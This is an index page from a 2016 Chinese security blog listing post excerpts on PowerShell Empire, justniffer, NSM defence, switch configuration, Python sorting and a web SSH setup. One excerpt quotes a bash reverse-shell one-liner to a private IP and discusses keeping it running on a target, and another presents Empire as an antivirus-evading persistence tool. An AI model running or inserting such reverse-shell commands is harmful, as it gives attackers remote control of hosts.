• powershell学习资源分享

    这段时间看了一个Windows下权限维持的开源工具组件Empire,采用powershell来对目标主机进行操作,由于是powershell,所有基本都是免杀。关于Empire,有兴趣的同学可以研究下,下面是相关学习资料: 作者博客: http://www.powershellempire.com/ GitHub链接:https://github.com/PowerShellEmpire Empire:PowerShell后 ...

    作者:s0nnet | 发布:2016-08-27 | 分类:代码艺术, 安全工具, 网络安全 | 围观:6,324 次 | 标签:, | 评论: 抢沙发
  • setsid实现后台运行

    0x00 经典姿势 下面这个在Linux下反弹shell的经典姿势相信大家一定不会陌生: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 但是,这样是有一个小问题的,就是当你在target主机上运行上面这句shell脚本时,它是一直在等待挂着的,如果退出的话,反弹出来的shell也会跟着断掉,这就不好玩了。   0x01 关 ...

    作者:s0nnet | 发布:2016-06-25 | 分类:C/C++, Kali Linux, Linux系统, 代码艺术, 网络安全 | 围观:8,948 次 | 标签:, | 评论: 抢沙发
  • 我所认识的大学·认识自己

    来大学之前,我曾在笔记本扉页上写过“大学,我认为是能学到很多东西的”。 这也是我在大学这平淡日子里,不断勉励自己,不断激发自己,坚持到我最后学生时代的一个理念。因为,平庸,让生活太过乏味。   发现自己有太多不足 有时候我也会时常感觉自己是一个奇葩的存在,甚至都没有正常人该有的生活技能。有些时候, ...

    作者:s0nnet | 发布:2016-06-16 | 分类:我的大学生活, 文学/随笔, 生活/随想 | 围观:4,197 次 | 标签: | 评论: 抢沙发
  • justniffer实战应用

    在上一篇blog《justniffer使用指南》中讲了justniffer的基本使用,本篇blog将分享一下justniffer在生产环境中的具体使用。下面就实际环境中的使用举一些例子加以说明。 0x01 输出日志格式 首先要讲到的就是justniffer的日志输出日志格式,因为这个功能太实用而且强大了。 使用参数:-l or –log-format=<forma ...

    作者:s0nnet | 发布:2016-05-26 | 分类:Kali Linux, TCP/IP, 安全工具, 安全资讯, 网络安全 | 围观:6,932 次 | 标签:, | 评论: 抢沙发
  • justniffer使用指南

    前言 本篇文章基本翻译自justniffer官方文档,因为笔者觉得自己能力有限,自己写这份指南将有损justniffer的强(bi)猛(ge)。同时,这也是NSM兵器谱中常用之一,笔者将会在随后一系列文章中分享这些利器的运筹之道,各位稍安勿躁。 0x00 justniffer介绍 justniffer是一款全面的网络协议分析利器,它可以捕获网络传输 ...

    作者:s0nnet | 发布:2016-05-19 | 分类:Kali Linux, TCP/IP, 安全工具, 安全资讯, 网络安全 | 围观:9,785 次 | 标签:, | 评论: 抢沙发
  • Linux下华为交换机的简单配置

    前言 由于管理学校数据中心机房,平时有一些学院的服务器需要托管等等,就需要给服务器分配IP地址。无奈数据中心刚建起来,核心交换机上的VLAN配置都需要临时划分。 关于网络工程这块本来是由一个学弟负责的,但是考虑到大家的课程,可能没有时间及时到规划网络。所以自己干脆学点这方面的东西,方便然后的维护管理工作 ...

    作者:s0nnet | 发布:2016-05-15 | 分类:GNU/Linux, Linux系统, 安全工具 | 围观:9,504 次 | 标签: | 评论: 抢沙发
  • NSM防御模型-基本方法

    本文接着上一篇博文《深入理解NSM–基本概念》 ,在最后说到以漏洞为中心的网络安全防御终将是失败的。在建立现代NSM网络安全监控模型中,将采用Bejtlich的以威胁为中心的防御思想。 以漏洞为中心 vs 以威胁为中心 这里引用《Applied Network Security monitoring》一书中的经典解释: 考虑在一个曲棍球比赛中,你的大门 ...

    作者:s0nnet | 发布:2016-05-13 | 分类:GNU/Linux, 安全工具, 安全资讯, 网络安全 | 围观:6,415 次 | 标签:, | 评论: 抢沙发
  • NSM防御模型-基本概念

    信息安全领域 随着当今互联网的不断发展,数据的安全重视程度也在不断升温,可谓“数据驱动安全”。信息安全现在已经被划分为不多不同的焦点领域。在《DoD 8500.2》中对整个计算机网络的防御分为了几个域: 保护:该领域主要聚焦对系统的安全加固,以防止事故发生时的漏洞利用与入侵成功。涉及到的代表性内容包括:漏洞评 ...

    作者:s0nnet | 发布:2016-05-10 | 分类:GNU/Linux, 安全工具, 安全资讯, 网络安全 | 围观:6,747 次 | 标签:, | 评论: 抢沙发
  • 几种常用排序的Python实现

    由于某些原因,我也开始看看算法方面的知识了,也是无奈啊~ 由于对Python比较熟悉,所以还是打算用它来复习下吧。  本文用Python实现了插入排序、冒泡排序、快速排序、直接选择排序、堆排序、归并排序。 1、插入排序 描述 插入排序的基本操作就是将一个数据插入到已经排好序的有序数据中,从而得到一个新的、个数加一的 ...

    作者:s0nnet | 发布:2016-02-14 | 分类:Python | 围观:3,660 次 | 评论: 抢沙发
  • Nginx下配置webssh

    0x00 前言 作为学校数据中心机房的维护人员,有时候总有一个电话打过来说咋咋咋哪台服务器出了点问题啥的。平时在宿舍或者工作室还好,关键是有时候TM正在上课啊。也就是说只能处在3G/4G网络环境下,由于学校防火墙那边对外的控制端口都控制的比较死,所以总得想个法子能在任何时候随时随地的连上校内集群,所以,本篇b ...

    作者:s0nnet | 发布:2016-02-03 | 分类:GNU/Linux, Linux系统 | 围观:6,624 次 | 标签:, | 评论: 抢沙发